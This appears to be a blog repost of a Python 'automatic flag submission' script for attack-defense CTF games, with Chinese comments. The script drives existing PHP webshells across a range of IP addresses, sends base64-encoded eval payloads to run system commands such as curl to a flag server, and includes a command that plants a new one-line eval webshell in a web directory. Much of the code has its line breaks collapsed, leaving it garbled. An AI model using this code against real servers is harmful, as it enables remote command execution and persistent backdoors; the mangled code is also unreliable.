import requests,base64,re #导入模块#re模块用来对返回的结果进行匹配
#curl 查看
#url 目标
#flag_url 提交flag的url curl flag_url
#method 木马连接方式
#passwd 木马密码
#flag_path 后门的路径 例如:shell.php webshell.php
def get_flag(url,flag_url,method,passwd,flag_path): #定义一个方法#url=192.168.0.0 flag_path=shell.php url=192.168.0.0/shell.phpurl="http://"+url+"/"+flag_path #最终webshell的路径#执行的命令cmd = "curl"+flag_url#cmd = 'whoani'#批量写入新木马cmd = 'echo ^<^?php ^@eval(^$^_POST[\'aaa\'])^;^?^> > C://phpStudy//PHPTutorial//WWW//css//123//newshell.php'#通过php函数执行的命令#ccc=@eval (base64_decode($_POST[z0]));#z0=payload payload为base64get_cmd = "echo system(\"%s\");"%cmddata={}data[passwd]="@eval(base64_decode($_POST[z0]));"data['z0']=base64.b64encode(bytes(get_cmd,encoding='utf-8'))#菜刀连接默认POST,以菜刀的方式取获取flag#判断methodif method == 'get':#判断是否存在webshelltry:res=get_re(url)print(res.content)except:print("[-] %s connection_timeout"%url)return 0elif method == 'post':try:res = post_re(url,data)match = re.findall("\n\n",res.content)if match:with open('flag.txt','a+') as f:f.write(match)print(res.content)except:print("[-]%s connection_timeout" %url)return 0#判断响应码200if res.status_code !=200:print("[-] %s webshell Not Found" %url)return 0else:print("[+] %s webshell is Found" %url)def get_re(url):res = requests.get(url=url,timeout=5)return resdef post_re(url,data):res =requests.post(url=url,data=data,timeout=5)return res#url="10.0.0."
#flag_url="http://192.168.45.1"
#method="post"
#passwd ="ccc"
#flag_path="neweshell.php"
url = input("input your url:")
flag_url = input("input your flag_url:")
method = input("input your method:")
passwd = input("input your passwd:")
flag_path = input("input your flag_path:")for ip in range(117,120):ip = str(ip)url=url+ipget_flag(url,flag_url,method,passwd,flag_path)url ="10.0.0."
自动提交flag脚本
本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 162202241@qq.com 举报,一经查实,本站将立刻删除。
最新评论
相关推荐
- 最新
- 随机